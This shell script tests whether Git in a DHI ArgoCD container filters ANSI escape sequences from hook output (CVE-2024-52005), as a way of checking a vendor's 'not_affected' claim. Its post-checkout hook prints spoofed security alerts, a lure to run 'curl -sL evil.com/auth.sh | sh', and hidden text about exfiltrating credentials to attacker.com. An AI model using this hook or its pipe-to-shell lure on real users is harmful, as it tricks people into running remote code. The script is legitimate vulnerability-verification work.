#!/bin/sh
#
# Docker Test Script for CVE-2024-52005
# This script is designed to run inside the DHI ArgoCD container
# and test the vulnerability without requiring volume mounts
#

set -e

echo "╔════════════════════════════════════════════════════════════════╗"
echo "║        CVE-2024-52005 Test in DHI ArgoCD Container            ║"
echo "╚════════════════════════════════════════════════════════════════╝"
echo ""

# Check Git version
echo "[+] Checking Git version..."
GIT_VERSION=$(git --version)
echo "    $GIT_VERSION"
echo ""

# Configure Git (required for commits)
git config --global user.email "test@example.com"
git config --global user.name "CVE Test"

# Create test repository with malicious hook
echo "[+] Creating test repository with malicious Git hook..."
WORKDIR="/tmp/cve-test"
mkdir -p "$WORKDIR"
cd "$WORKDIR"

# Create a simple repo
mkdir -p test-repo
cd test-repo
git init -q
echo "# Innocent Application" > README.md
git add README.md
git commit -q -m "Initial commit"

# Create malicious post-checkout hook
echo "[+] Adding post-checkout hook with ANSI escape sequences..."
mkdir -p .git/hooks
cat > .git/hooks/post-checkout << 'HOOK_EOF'
#!/bin/sh
# CVE-2024-52005: ANSI escape sequence injection
# These sequences should be filtered but aren't in vulnerable versions

printf '\033[31m\033[1mremote: ════════════════════════════════════════════\033[0m\n' >&2
printf '\033[31m\033[1mremote: ⚠️  CRITICAL SECURITY ALERT  ⚠️\033[0m\n' >&2
printf '\033[31m\033[1mremote: ════════════════════════════════════════════\033[0m\n' >&2
printf '\033[33mremote: \n' >&2
printf '\033[33mremote: Your system failed security validation!\033[0m\n' >&2
printf '\033[33mremote: This repository requires authorization.\033[0m\n' >&2
printf '\033[33mremote: \n' >&2
printf '\033[32mremote: Run: curl -sL evil.com/auth.sh | sh\033[0m\n' >&2
printf '\033[8mremote: HIDDEN: exfiltrating credentials to attacker.com\033[0m\n' >&2
printf '\033[32mremote: \n' >&2
printf '\033[32m\033[1mremote: ✓ All security checks passed\033[0m\n' >&2
printf '\033[32mremote: ✓ Repository validated\033[0m\n' >&2
HOOK_EOF
chmod +x .git/hooks/post-checkout

echo "[+] Hook created successfully"
echo ""

# Test the vulnerability
echo "[+] Testing ANSI injection vulnerability..."
echo "[+] Cloning repository (this triggers the hook)..."
OUTPUT_FILE="/tmp/cve-test-output.log"
cd "$WORKDIR"
git clone test-repo test-clone 2>&1 | tee "$OUTPUT_FILE"

echo ""
echo "╔════════════════════════════════════════════════════════════════╗"
echo "║                  VULNERABILITY ANALYSIS                        ║"
echo "╚════════════════════════════════════════════════════════════════╝"
echo ""

# Check for ANSI sequences
if grep -F $'\033[' "$OUTPUT_FILE" > /dev/null 2>&1; then
    echo "🔴 VULNERABLE: ANSI escape sequences detected!"
    echo ""
    echo "Status: CVE-2024-52005 is EXPLOITABLE"
    echo "Impact: Terminal manipulation, log poisoning, social engineering"
    echo ""
    echo "Proof (raw ANSI codes):"
    echo "----------------------------------------"
    cat -v "$OUTPUT_FILE"
    echo "----------------------------------------"
    echo ""
    echo "❌ DHI's VEX claim of 'not_affected' is INCORRECT"
    echo ""
    echo "The ^[[31m, ^[[32m, ^[[33m codes are ANSI escape sequences that"
    echo "should be filtered but passed through to the terminal."
    echo ""
    echo "In a real attack, these could:"
    echo "  • Hide malicious commands (^[[8m = invisible text)"
    echo "  • Fake security scan results"
    echo "  • Manipulate CI/CD logs"
    echo "  • Social engineer users"
    exit 1
else
    echo "✓ Not vulnerable: ANSI sequences were filtered"
    echo ""
    echo "Git version $GIT_VERSION appears to be patched."
    exit 0
fi
